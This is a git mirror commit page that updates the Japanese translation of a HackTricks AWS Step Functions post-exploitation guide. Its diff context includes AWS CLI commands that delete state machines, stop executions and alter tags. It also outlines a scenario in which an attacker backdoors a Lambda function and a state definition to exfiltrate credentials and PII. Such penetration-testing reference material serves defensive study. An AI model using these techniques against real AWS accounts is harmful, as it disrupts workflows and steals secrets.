mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-13 21:36:23 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-post-exploitation/aws
This commit is contained in:
BIN
src/images/workspace_oauth.png
Normal file
BIN
src/images/workspace_oauth.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 277 KiB |
@@ -33,7 +33,7 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn <valu
|
|||||||
# Delete state machine alias
|
# Delete state machine alias
|
||||||
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
|
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
|
||||||
```
|
```
|
||||||
- **潜在的影響**: 重要なワークフローの中断、データ損失、および運用のダウンタイム。
|
- **潜在的な影響**: 重要なワークフローの中断、データ損失、および運用のダウンタイム。
|
||||||
|
|
||||||
### `states:UpdateMapRun`
|
### `states:UpdateMapRun`
|
||||||
|
|
||||||
@@ -45,7 +45,7 @@ aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value
|
|||||||
|
|
||||||
### `states:StopExecution`
|
### `states:StopExecution`
|
||||||
|
|
||||||
この権限を持つ攻撃者は、任意のステートマシンの実行を停止でき、進行中のワークフローやプロセスを中断させる可能性があります。これにより、未完了のトランザクション、停止したビジネスオペレーション、そして潜在的なデータの破損が発生する可能性があります。
|
この権限を持つ攻撃者は、任意のステートマシンの実行を停止でき、進行中のワークフローやプロセスを中断させる可能性があります。これにより、未完了のトランザクション、停止したビジネスオペレーション、潜在的なデータの破損が発生する可能性があります。
|
||||||
|
|
||||||
> [!WARNING]
|
> [!WARNING]
|
||||||
> このアクションは**エクスプレスステートマシン**ではサポートされていません。
|
> このアクションは**エクスプレスステートマシン**ではサポートされていません。
|
||||||
@@ -56,7 +56,7 @@ aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--ca
|
|||||||
|
|
||||||
### `states:TagResource`, `states:UntagResource`
|
### `states:TagResource`, `states:UntagResource`
|
||||||
|
|
||||||
攻撃者は、Step Functionsリソースからタグを追加、変更、または削除することができ、タグに基づく組織のコスト配分、リソース追跡、及びアクセス制御ポリシーを混乱させる可能性があります。
|
攻撃者は、Step Functionsリソースからタグを追加、変更、または削除することができ、これにより組織のコスト配分、リソース追跡、およびタグに基づくアクセス制御ポリシーが混乱する可能性があります。
|
||||||
```bash
|
```bash
|
||||||
aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
|
aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
|
||||||
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
|
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
|
||||||
@@ -89,9 +89,9 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
|
|||||||
```
|
```
|
||||||
...は、LambdaのバックドアとStep Functionのロジック操作を組み合わせることで、**高影響かつステルスなポストエクスプロイテーション攻撃**を実行できます。
|
...は、LambdaのバックドアとStep Functionのロジック操作を組み合わせることで、**高影響かつステルスなポストエクスプロイテーション攻撃**を実行できます。
|
||||||
|
|
||||||
このシナリオでは、被害者が**AWS Step Functionsを使用して、資格情報、トークン、またはPIIなどの機密入力を処理するワークフローをオーケストレーションしている**と仮定します。
|
このシナリオは、被害者が**AWS Step Functionsを使用して、資格情報、トークン、またはPIIなどの機密入力を処理するワークフローをオーケストレーションしている**ことを前提としています。
|
||||||
|
|
||||||
例の被害者の呼び出し:
|
例としての被害者の呼び出し:
|
||||||
```bash
|
```bash
|
||||||
aws stepfunctions start-execution \
|
aws stepfunctions start-execution \
|
||||||
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
|
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
|
||||||
@@ -101,7 +101,7 @@ aws stepfunctions start-execution \
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
#### ラムダ関数を更新した
|
#### ラムダ関数の更新
|
||||||
|
|
||||||
攻撃者は、Step Functionによって既に使用されているLambda関数(`LegitBusinessLogic`)のコードを修正し、入力データを静かに外部に流出させます。
|
攻撃者は、Step Functionによって既に使用されているLambda関数(`LegitBusinessLogic`)のコードを修正し、入力データを静かに外部に流出させます。
|
||||||
```python
|
```python
|
||||||
@@ -147,7 +147,7 @@ aws stepfunctions update-state-machine \
|
|||||||
```
|
```
|
||||||
攻撃者は、状態定義を次のように更新することで、さらにステルス性を高めることができます。
|
攻撃者は、状態定義を次のように更新することで、さらにステルス性を高めることができます。
|
||||||
{
|
{
|
||||||
"Comment": "Exfiltrationのためのバックドア",
|
"Comment": "Exfiltrationのためにバックドアを仕込む",
|
||||||
"StartAt": "ExfiltrateSecrets",
|
"StartAt": "ExfiltrateSecrets",
|
||||||
"States": {
|
"States": {
|
||||||
"ExfiltrateSecrets": {
|
"ExfiltrateSecrets": {
|
||||||
|
|||||||
Reference in New Issue
Block a user